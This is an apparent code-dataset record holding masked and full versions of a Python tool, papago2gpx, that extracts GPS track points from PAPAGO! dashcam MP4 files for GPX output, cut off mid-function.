self._input_paths\n <mask token>\n\n @property\n def description(self) ->Optional[str]:\n return self._description\n\n @property\n def author_name(self) ->Optional[str]:\n return self._author_name\n\n @property\n def author_email(self) ->Optional[str]:\n return self._author_email\n\n @property\n def copyright(self) ->Optional[str]:\n return self._copyright\n\n @property\n def copyright_year(self) ->Optional[int]:\n return self._copyright_year\n\n @property\n def copyright_license(self) ->Optional[str]:\n return self._copyright_license\n\n @property\n def keywords(self) ->Optional[str]:\n return self._keywords\n\n @property\n def track_name(self) ->Optional[str]:\n return self._track_name\n\n @property\n def track_comment(self) ->Optional[str]:\n return self._track_comment\n\n @property\n def track_description(self) ->Optional[str]:\n return self._track_description\n <mask token>\n <mask token>\n <mask token>\n\n\nclass BrokenMp4FileError(RuntimeError):\n\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataError(RuntimeError):\n\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataBlockIndex(object):\n\n def __init__(self, position: int, size: int):\n if position <= 0:\n raise ValueError(f\"An invalid position: `{position}'.\")\n if size <= 0:\n raise ValueError(f\"An invalid size: `{size}'.\")\n self._position = position\n self._size = size\n\n @property\n def position(self) ->int:\n return self._position\n\n @property\n def size(self) ->int:\n return self._size\n\n\n<mask token>\n\n\nclass Time(object):\n\n def __init__(self, time: datetime.datetime):\n if time.tzinfo is None:\n raise ValueError(\n \"Expect an aware `datetime' object, but got naive one.\")\n self._time = time.astimezone(datetime.timezone.utc)\n\n def as_local_time(self) ->datetime.datetime:\n return self._time.astimezone()\n\n def __repr__(self) ->str:\n result = self._time.strftime('%Y-%m-%dT%H:%M:%S%z')\n return 
re.sub('(\\\\+\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', result)\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return self._time == other._time\n\n\nclass Latitude(object):\n\n def __init__(self, degree: float):\n if degree < -90 or 90 < degree:\n raise ValueError(\"An invalid latitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Longitude(object):\n\n def __init__(self, degree: float):\n if degree < -180 or 180 < degree:\n raise ValueError(\"An invalid longitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Speed(object):\n\n def __init__(self, meter_per_second: float):\n self._meter_per_second = meter_per_second\n\n def __repr__(self) ->str:\n return format(self._meter_per_second, '.2F')\n\n\nclass Azimuth(object):\n\n def __init__(self, degree: float):\n if degree < 0 or 360 <= degree:\n raise ValueError(f\"An invalid azimuth degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.2F')\n\n\nclass TrackPoint(object):\n\n def __init__(self, time: Time, status: str, latitude: Optional[Latitude\n ], longitude: Optional[Longitude], speed: Speed, azimuth: Azimuth,\n x_acceleration: int, y_acceleration: int, z_acceleration: int):\n if (status == 'V' or status is None) != (latitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, latitude = {latitude}'\n )\n if (status == 'V' or status is None) != (longitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, 
longitude = {longitude}'\n )\n self._time = time\n self._status = status\n self._latitude = latitude\n self._longitude = longitude\n self._speed = speed\n self._azimuth = azimuth\n self._x_acceleration = x_acceleration\n self._y_acceleration = y_acceleration\n self._z_acceleration = z_acceleration\n\n @property\n def time(self) ->Time:\n return self._time\n\n @property\n def status(self) ->str:\n return self._status\n\n @property\n def latitude(self) ->Optional[Latitude]:\n return self._latitude\n\n @property\n def longitude(self) ->Optional[Longitude]:\n return self._longitude\n\n @property\n def speed(self) ->Speed:\n return self._speed\n\n @property\n def azimuth(self) ->Azimuth:\n return self._azimuth\n\n @property\n def x_acceleration(self) ->int:\n return self._x_acceleration\n\n @property\n def y_acceleration(self) ->int:\n return self._y_acceleration\n\n @property\n def z_acceleration(self) ->int:\n return self._z_acceleration\n\n @property\n def name(self) ->str:\n local_time = self._time.as_local_time()\n return local_time.strftime('%Y%m%d%H%M%S')\n\n def format_as_csv(self) ->str:\n if self._time is not None:\n local_time = self._time.as_local_time()\n result = local_time.strftime('%Y/%m/%d %H:%M:%S')\n else:\n result = ''\n status = self._status if self._status is not None else ''\n result += f',{status}'\n latitude = str(self._latitude) if self._latitude is not None else ''\n result += f',{latitude}'\n longitude = str(self._longitude) if self._longitude is not None else ''\n result += f',{longitude}'\n result += f',{self._speed}'\n result += f',{self._azimuth}'\n result += f',{self._x_acceleration}'\n result += f',{self._y_acceleration}'\n result += f',{self._z_acceleration}'\n return result\n\n def __repr__(self) ->str:\n latitude = str(self._latitude) if self._latitude is not None else ''\n longitude = str(self._longitude) if self._longitude is not None else ''\n return f'{self._time},{latitude},{longitude}'\n\n def __lt__(self, other) ->bool:\n 
return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return (self._time == other._time and self._latitude == other.\n _latitude and self._longitude == other._longitude)\n\n\nclass TrackSegment(object):\n\n def __init__(self):\n self._track_points = []\n\n def append_track_point(self, track_point: TrackPoint) ->None:\n self._track_points.append(track_point)\n\n def __len__(self) ->int:\n return len(self._track_points)\n\n def __iter__(self) ->Iterable[TrackPoint]:\n return iter(self._track_points)\n\n\n<mask token>\n",
"step-4": "import re\nimport datetime\nimport math\nimport pathlib\nimport os\nimport io\nimport argparse\nimport subprocess\nimport xml.sax.saxutils\nfrom typing import Optional, List, Iterable\nimport sys\n_DEFAULT_TRACK_TYPE = 'Dashcam track'\n\n\nclass Arguments(object):\n\n def __init__(self):\n parser = argparse.ArgumentParser(prog='papago2gpx', description=\n 'Extract GPS data from MP4 video files created by PAPAGO! dashcams, and format them into a GPX file.'\n )\n parser.add_argument('input_paths', nargs='+', help=\n 'The path to an input file or directory.', metavar='INPUT_PATH')\n parser.add_argument('--name', help=\n 'The name of the GPX file to output. Default to 16 deciaml digits representing the first GPS record time.'\n , metavar='NAME')\n parser.add_argument('--description', help=\n 'The description of the GPX file to output.', metavar='DESCRIPTION'\n )\n parser.add_argument('--author-name', help=\n 'The name of the author of the GPX file to output.', metavar=\n 'AUTHOR_NAME')\n parser.add_argument('--author-email', help=\n 'The Email address of the author of the GPX file to output.',\n metavar='AUTHOR_EMAIL')\n parser.add_argument('--copyright', help=\n \"The copyright holder of the GPX file to output. Default to `AUTHOR_NAME'.\"\n , metavar='COPYRIGHT')\n parser.add_argument('--copyright-year', help=\n 'The copyright year of the GPX file to output. 
Default to the year the file is created.'\n , metavar='COPYRIGHT_YEAR')\n parser.add_argument('--copyright-license', help=\n 'A link to an external file containing license text.', metavar=\n 'LICENSE')\n parser.add_argument('--keywords', help=\n 'Keywords associated with the GPX file to output.', metavar=\n 'KEYWORDS')\n parser.add_argument('--track-name', help='The name of the track.',\n metavar='TRACK_NAME')\n parser.add_argument('--track-comment', help=\n 'The comment of the track.', metavar='TRACK_COMMENT')\n parser.add_argument('--track-description', help=\n 'The description of the track.', metavar='TRACK_DESCRIPTION')\n parser.add_argument('--track-type', default=_DEFAULT_TRACK_TYPE,\n help=f\"The type of the track. Default to `{_DEFAULT_TRACK_TYPE}'.\")\n parser.add_argument('--uniq', choices=['first', 'last'], help=\n 'How to process different coordinates recorded at the same timestamp. Default to an error.'\n )\n parser.add_argument('--overwrite', action='store_true', help=\n 'Allow to overwrite an existing file.')\n args = parser.parse_args()\n self._input_paths = []\n for input_path in args.input_paths:\n input_path = pathlib.Path(input_path)\n if not input_path.exists():\n print(f'{input_path}: File does not exist.', file=sys.stderr)\n sys.exit(1)\n self._input_paths.append(input_path)\n self._name = args.name\n self._description = args.description\n self._author_name = args.author_name\n self._author_email = args.author_email\n self._copyright = args.copyright\n if self._copyright is None and self._author_name is not None:\n self._copyright = self._author_name\n self._copyright_year = args.copyright_year\n if self._copyright_year is not None and self._copyright is None:\n print(\"`--copyright-year' is specified, but `--copyright' is not.\",\n file=sys.stderr)\n sys.exit(1)\n if self._copyright_year is None and self._copyright is not None:\n utc_now = datetime.datetime.now(datetime.timezone.utc)\n local_aware_now = utc_now.astimezone()\n 
self._copyright_year = local_aware_now.year\n self._copyright_license = args.copyright_license\n if self._copyright_license is not None and self._copyright is None:\n print(\n \"`--copyright-license' is specified, but `--copyright' is not.\"\n , file=sys.stderr)\n sys.exit(1)\n self._keywords = args.keywords\n self._track_name = args.track_name\n self._track_comment = args.track_comment\n self._track_description = args.track_description\n self._track_type = args.track_type\n if self._track_type is None:\n self._track_type = _DEFAULT_TRACK_TYPE\n if self._track_type == '':\n self._track_type = None\n self._how_to_unique = args.uniq\n self._overwrite = args.overwrite\n\n @property\n def input_paths(self) ->List[pathlib.Path]:\n return self._input_paths\n\n @property\n def name(self) ->Optional[str]:\n return self._name\n\n @property\n def description(self) ->Optional[str]:\n return self._description\n\n @property\n def author_name(self) ->Optional[str]:\n return self._author_name\n\n @property\n def author_email(self) ->Optional[str]:\n return self._author_email\n\n @property\n def copyright(self) ->Optional[str]:\n return self._copyright\n\n @property\n def copyright_year(self) ->Optional[int]:\n return self._copyright_year\n\n @property\n def copyright_license(self) ->Optional[str]:\n return self._copyright_license\n\n @property\n def keywords(self) ->Optional[str]:\n return self._keywords\n\n @property\n def track_name(self) ->Optional[str]:\n return self._track_name\n\n @property\n def track_comment(self) ->Optional[str]:\n return self._track_comment\n\n @property\n def track_description(self) ->Optional[str]:\n return self._track_description\n\n @property\n def track_type(self) ->Optional[str]:\n return self._track_type\n\n @property\n def how_to_unique(self) ->str:\n return self._how_to_unique\n\n @property\n def overwrite(self) ->bool:\n return self._overwrite\n\n\nclass BrokenMp4FileError(RuntimeError):\n\n def __init__(self, message: str):\n 
super().__init__(message)\n\n\nclass GpsDataError(RuntimeError):\n\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataBlockIndex(object):\n\n def __init__(self, position: int, size: int):\n if position <= 0:\n raise ValueError(f\"An invalid position: `{position}'.\")\n if size <= 0:\n raise ValueError(f\"An invalid size: `{size}'.\")\n self._position = position\n self._size = size\n\n @property\n def position(self) ->int:\n return self._position\n\n @property\n def size(self) ->int:\n return self._size\n\n\ndef get_gps_data_block_indices(mp4_file: io.FileIO) ->List[GpsDataBlockIndex]:\n target_box_path = ['moov', 'gps ']\n while True:\n box_size = mp4_file.read(4)\n if len(box_size) == 0:\n raise GpsDataError(\n f'{mp4_file.name}: Could not find any GPS data block index.')\n if len(box_size) < 4:\n error_position = format(mp4_file.tell() - len(box_size), '#010x')\n raise BrokenMp4FileError(\n f'{mp4_file.name}:{error_position}: Expect the size of a box, but got EOF.'\n )\n box_size = int.from_bytes(box_size, 'big')\n box_type = mp4_file.read(4)\n if len(box_type) < 4:\n error_position = format(mp4_file.tell() - len(box_type), '#010x')\n raise BrokenMp4FileError(\n f'{mp4_file.name}:{error_position}: Expect the type of a box, but got EOF.'\n )\n box_type = box_type.decode('UTF-8')\n if box_size == 0:\n box_size = None\n next_position = None\n elif box_size == 1:\n box_size = mp4_file.read(8)\n if len(box_size) < 8:\n error_position = format(mp4_file.tell() - len(box_size),\n '#010x')\n raise BrokenMp4FileError(\n f'{mp4_file.name}:{error_position}: Expect the size of a box, but got EOF.'\n )\n box_size = int.from_bytes(box_size, 'big')\n next_position = mp4_file.tell() + box_size - 16\n else:\n next_position = mp4_file.tell() + box_size - 8\n if box_type == target_box_path[0]:\n target_box_path.pop(0)\n if len(target_box_path) == 0:\n break\n else:\n if next_position is None:\n raise GpsDataError(\n f'{mp4_file.name}: Could not find 
any GPS data block index.'\n )\n mp4_file.seek(next_position)\n if mp4_file.tell() != next_position:\n raise BrokenMp4FileError(\n f'{mp4_file.name}: The size of a box is not equal to the actual one.'\n )\n unknown = mp4_file.read(4)\n if len(unknown) < 4:\n error_position = format(mp4_file.tell() - len(unknown), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a big-endian 32-bit unsigned integer, but got EOF.'\n )\n unknown = int.from_bytes(unknown, 'big')\n if unknown != 257:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect a big-endian 32-bit unsigned integer with value `257', but got `{unknown}'.\"\n )\n gps_data_block_count = mp4_file.read(4)\n if len(gps_data_block_count) < 4:\n error_position = format(mp4_file.tell() - len(gps_data_block_count),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a big-endian 32-bit unsigned integer, but got EOF.'\n )\n gps_data_block_count = int.from_bytes(gps_data_block_count, 'big')\n gps_data_block_indices = []\n for i in range(gps_data_block_count):\n position = mp4_file.read(4)\n if len(position) < 4:\n error_position = format(mp4_file.tell() - len(position), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the position of a GPS data block, but got EOF.'\n )\n position = int.from_bytes(position, 'big')\n if position < 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the position of a GPS data block, but got an invalid value `{position}'.\"\n )\n size = mp4_file.read(4)\n if len(size) < 4:\n error_position = format(mp4_file.tell() - len(size), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the size of a GPS data block, but got EOF.'\n )\n size = int.from_bytes(size, 'big')\n if size < 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise 
GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the size of a GPS data block, but got an invalid value `{size}'.\"\n )\n if position == 0 or size == 0:\n print(\n f'{mp4_file.name}: Warning: The index of GPS data blocks is not recorded.'\n , file=sys.stderr)\n else:\n gps_data_block_index = GpsDataBlockIndex(position, size)\n gps_data_block_indices.append(gps_data_block_index)\n if mp4_file.tell() != next_position:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(\n f'{mp4_file_path}:{error_position}: Expect EOF, but find additional data.'\n )\n return gps_data_block_indices\n\n\ndef read_little_endian_single(mp4_file: io.FileIO) ->float:\n data = mp4_file.read(4)\n if len(data) < 4:\n error_position = format(mp4_file.tell() - len(data), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a little-endian single-precision floating point number, but got EOF.'\n )\n data = int.from_bytes(data, 'little')\n sign = (data & 2147483648) >> 31\n exponent = ((data & 2139095040) >> 23) - 127\n mantissa = data & 8388607 | 8388608\n sign = '+' if sign == 0 else '-'\n exponent = str(exponent - 23)\n mantissa_hex = format(mantissa, '08x')\n return float.fromhex(f'{sign}0x{mantissa_hex}p{exponent}')\n\n\nclass Time(object):\n\n def __init__(self, time: datetime.datetime):\n if time.tzinfo is None:\n raise ValueError(\n \"Expect an aware `datetime' object, but got naive one.\")\n self._time = time.astimezone(datetime.timezone.utc)\n\n def as_local_time(self) ->datetime.datetime:\n return self._time.astimezone()\n\n def __repr__(self) ->str:\n result = self._time.strftime('%Y-%m-%dT%H:%M:%S%z')\n return re.sub('(\\\\+\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', result)\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return self._time == other._time\n\n\nclass Latitude(object):\n\n def __init__(self, degree: float):\n if degree < -90 or 90 < degree:\n raise ValueError(\"An 
invalid latitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Longitude(object):\n\n def __init__(self, degree: float):\n if degree < -180 or 180 < degree:\n raise ValueError(\"An invalid longitude degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) ->bool:\n return self._degree < other._degree\n\n def __eq__(self, other) ->bool:\n return self._degree == other._degree\n\n\nclass Speed(object):\n\n def __init__(self, meter_per_second: float):\n self._meter_per_second = meter_per_second\n\n def __repr__(self) ->str:\n return format(self._meter_per_second, '.2F')\n\n\nclass Azimuth(object):\n\n def __init__(self, degree: float):\n if degree < 0 or 360 <= degree:\n raise ValueError(f\"An invalid azimuth degree: `{degree}'.\")\n self._degree = degree\n\n def __repr__(self) ->str:\n return format(self._degree, '.2F')\n\n\nclass TrackPoint(object):\n\n def __init__(self, time: Time, status: str, latitude: Optional[Latitude\n ], longitude: Optional[Longitude], speed: Speed, azimuth: Azimuth,\n x_acceleration: int, y_acceleration: int, z_acceleration: int):\n if (status == 'V' or status is None) != (latitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, latitude = {latitude}'\n )\n if (status == 'V' or status is None) != (longitude is None):\n raise ValueError(\n f'Inconsistent arguments: status = {status}, longitude = {longitude}'\n )\n self._time = time\n self._status = status\n self._latitude = latitude\n self._longitude = longitude\n self._speed = speed\n self._azimuth = azimuth\n self._x_acceleration = x_acceleration\n self._y_acceleration = y_acceleration\n self._z_acceleration = z_acceleration\n\n @property\n def time(self) 
->Time:\n return self._time\n\n @property\n def status(self) ->str:\n return self._status\n\n @property\n def latitude(self) ->Optional[Latitude]:\n return self._latitude\n\n @property\n def longitude(self) ->Optional[Longitude]:\n return self._longitude\n\n @property\n def speed(self) ->Speed:\n return self._speed\n\n @property\n def azimuth(self) ->Azimuth:\n return self._azimuth\n\n @property\n def x_acceleration(self) ->int:\n return self._x_acceleration\n\n @property\n def y_acceleration(self) ->int:\n return self._y_acceleration\n\n @property\n def z_acceleration(self) ->int:\n return self._z_acceleration\n\n @property\n def name(self) ->str:\n local_time = self._time.as_local_time()\n return local_time.strftime('%Y%m%d%H%M%S')\n\n def format_as_csv(self) ->str:\n if self._time is not None:\n local_time = self._time.as_local_time()\n result = local_time.strftime('%Y/%m/%d %H:%M:%S')\n else:\n result = ''\n status = self._status if self._status is not None else ''\n result += f',{status}'\n latitude = str(self._latitude) if self._latitude is not None else ''\n result += f',{latitude}'\n longitude = str(self._longitude) if self._longitude is not None else ''\n result += f',{longitude}'\n result += f',{self._speed}'\n result += f',{self._azimuth}'\n result += f',{self._x_acceleration}'\n result += f',{self._y_acceleration}'\n result += f',{self._z_acceleration}'\n return result\n\n def __repr__(self) ->str:\n latitude = str(self._latitude) if self._latitude is not None else ''\n longitude = str(self._longitude) if self._longitude is not None else ''\n return f'{self._time},{latitude},{longitude}'\n\n def __lt__(self, other) ->bool:\n return self._time < other._time\n\n def __eq__(self, other) ->bool:\n return (self._time == other._time and self._latitude == other.\n _latitude and self._longitude == other._longitude)\n\n\nclass TrackSegment(object):\n\n def __init__(self):\n self._track_points = []\n\n def append_track_point(self, track_point: TrackPoint) 
->None:\n self._track_points.append(track_point)\n\n def __len__(self) ->int:\n return len(self._track_points)\n\n def __iter__(self) ->Iterable[TrackPoint]:\n return iter(self._track_points)\n\n\n_UNKNOWN_BYTES = (\n b'\\x00!\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\xbc\\xc7\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00<\\xdb\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\xb5\\x18\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\xfe\\x19\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00 \\xf9\\x1b\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\xac\\xb3\\x1c\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00'\n )\n\n\ndef parse_mp4_file(mp4_file_path: pathlib.Path) ->List[TrackPoint]:\n track_points = []\n with open(mp4_file_path, 'rb') as mp4_file:\n gps_data_block_indices = get_gps_data_block_indices(mp4_file)\n for gps_data_block_index in gps_data_block_indices:\n mp4_file.seek(gps_data_block_index.position)\n if mp4_file.tell() != gps_data_block_index.position:\n error_position = gps_data_block_index.position\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a GPS data block, but got EOF.'\n )\n large_block_size = mp4_file.read(4)\n if len(large_block_size) < 4:\n error_position = format(mp4_file.tell() - len(\n large_block_size), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the size of a GPS data block, but got EOF.'\n )\n large_block_size = int.from_bytes(large_block_size, 'big')\n if large_block_size != gps_data_block_index.size:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f'{mp4_file_path}:{error_position}: The size of a GPS data block is not equal to the one stored in the index.'\n )\n large_block_end = mp4_file.tell() - 4 + large_block_size\n signature = mp4_file.read(8)\n if len(signature) < 8:\n error_position = 
format(mp4_file.tell() - len(signature),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the signature of a GPS data block, but got EOF.'\n )\n signature = signature.decode('UTF-8')\n if signature != 'freeGPS ':\n error_position = format(mp4_file.tell() - 8, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `freeGPS ' as the signature of a GPS data block, but got `{signature}'.\"\n )\n small_block_size = mp4_file.read(4)\n if len(small_block_size) < 4:\n error_position = format(mp4_file.tell() - len(\n small_block_size), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the size of a GPS data block, but got EOF.'\n )\n small_block_size = int.from_bytes(small_block_size, 'little')\n if small_block_size != 88:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `88' as the size of a GPS data block, but got `{small_block_size}'.\"\n )\n small_block_end = mp4_file.tell() + small_block_size\n padding = mp4_file.read(32)\n if len(padding) < 32:\n error_position = format(mp4_file.tell() - len(padding), '#010x'\n )\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect zero padding, but got EOF.'\n )\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(mp4_file.tell() - 32 + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n hour = mp4_file.read(4)\n if len(hour) < 4:\n error_position = format(mp4_file.tell() - len(hour), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the hour of time, but got EOF.'\n )\n hour = int.from_bytes(hour, 'little')\n if hour < 0 or 24 <= hour:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the hour of time, but got an invalid value `{hour}'.\"\n 
)\n minute = mp4_file.read(4)\n if len(minute) < 4:\n error_position = format(mp4_file.tell() - len(minute), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the minute of time, but got EOF.'\n )\n minute = int.from_bytes(minute, 'little')\n if minute < 0 or 60 <= minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the minute of time, but got an invalid value `{minute}'.\"\n )\n second = mp4_file.read(4)\n if len(second) < 4:\n error_position = format(mp4_file.tell() - len(second), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the second of time, but got EOF.'\n )\n second = int.from_bytes(second, 'little')\n if second < 0 or 60 <= second:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the second of time, but got an invalid value `{second}'.\"\n )\n year = mp4_file.read(4)\n if len(year) < 4:\n error_position = format(mp4_file.tell() - len(year), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the year of time, but got EOF.'\n )\n year = int.from_bytes(year, 'little')\n if year == 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n if hour != 0:\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: `year == 0' but `hour != 0'.\"\n )\n if minute != 0:\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: `year == 0' but `minute != 0'.\"\n )\n if second != 0:\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: `year == 0' but `second != 0'.\"\n )\n else:\n year += 2000\n month = mp4_file.read(4)\n if len(month) < 4:\n error_position = format(mp4_file.tell() - len(month), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the month of time, but got EOF.'\n )\n month = int.from_bytes(month, 'little')\n if month == 0:\n if year != 0:\n raise GpsDataError(\n 
f\"{mp4_file.name}:{error_position}: `year != 0' but `month == 0'.\"\n )\n assert hour == 0\n assert minute == 0\n assert second == 0\n elif month < 1 or 12 < month:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the month of time, but got an invalid value `{month}'.\"\n )\n day = mp4_file.read(4)\n if len(day) < 4:\n error_position = format(mp4_file.tell() - len(day), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the day of time, but got EOF.'\n )\n day = int.from_bytes(day, 'little')\n if day == 0:\n if year != 0:\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: `year != 0' but `day == 0'.\"\n )\n assert month == 0\n assert hour == 0\n assert minute == 0\n assert second == 0\n elif day < 1 or 31 < day:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the day of time, but got an invalid value `{day}'.\"\n )\n if year == 0:\n assert month == 0\n assert day == 0\n assert hour == 0\n assert minute == 0\n assert second == 0\n time = None\n else:\n time = datetime.datetime.now(datetime.timezone.utc)\n time = time.astimezone()\n time = time.replace(year=year, month=month, day=day, hour=\n hour, minute=minute, second=second, microsecond=0)\n time = Time(time)\n if time is None:\n padding = mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect zero-padding, but got EOF.'\n )\n padding = int.from_bytes(padding, 'little')\n if padding != 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero-padding, but got `{padding}'.\"\n )\n status = None\n latitude_type = '0'\n longitude_type = '0'\n else:\n status = mp4_file.read(1)\n if len(status) < 1:\n error_position = format(mp4_file.tell() - 
len(status),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a status character, but got EOF.'\n )\n status = status.decode('UTF-8')\n if status not in ('A', 'V'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `A' or `V' as a status character, but got an invalid character `{status}'.\"\n )\n latitude_type = mp4_file.read(1)\n if len(latitude_type) < 1:\n error_position = format(mp4_file.tell() - len(\n latitude_type), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a latitude type, but got EOF.'\n )\n latitude_type = latitude_type.decode('UTF-8')\n if status == 'A':\n if latitude_type not in ('N', 'S'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `N' or `S' as a latitude type, but got an invalid character `{latitude_type}'.\"\n )\n else:\n assert status == 'V'\n if latitude_type != '0':\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `0' as a latitude type, but got an invalid character `{latitude_type}'.\"\n )\n longitude_type = mp4_file.read(1)\n if len(longitude_type) < 1:\n error_position = format(mp4_file.tell() - len(\n longitude_type), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a longitude type, but got EOF.'\n )\n longitude_type = longitude_type.decode('UTF-8')\n if status == 'A':\n if longitude_type not in ('E', 'W'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `E' or `W' as a longitude type, but got an invalid character `{longitude_type}'.\"\n )\n else:\n assert status == 'V'\n if longitude_type != '0':\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `0' as a longitude type, but got 
an invalid character `{longitude_type}'.\"\n )\n padding = mp4_file.read(1)\n if len(padding) < 1:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect zero padding, but got EOF.'\n )\n if padding[0] != 0:\n error_position = format(mp4_file.tell() - 1, '#010x')\n byte = format(padding[0], '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n if status == 'A':\n latitude_dmm = read_little_endian_single(mp4_file)\n latitude_degree = math.floor(latitude_dmm / 100)\n if latitude_degree < 0 or 90 < latitude_degree:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.\"\n )\n latitude_minute = latitude_dmm - latitude_degree * 100\n if latitude_minute < 0 or 60 <= latitude_minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.\"\n )\n latitude_degree += latitude_minute / 60\n latitude = Latitude(latitude_degree)\n else:\n assert status == 'V' or status is None\n padding = 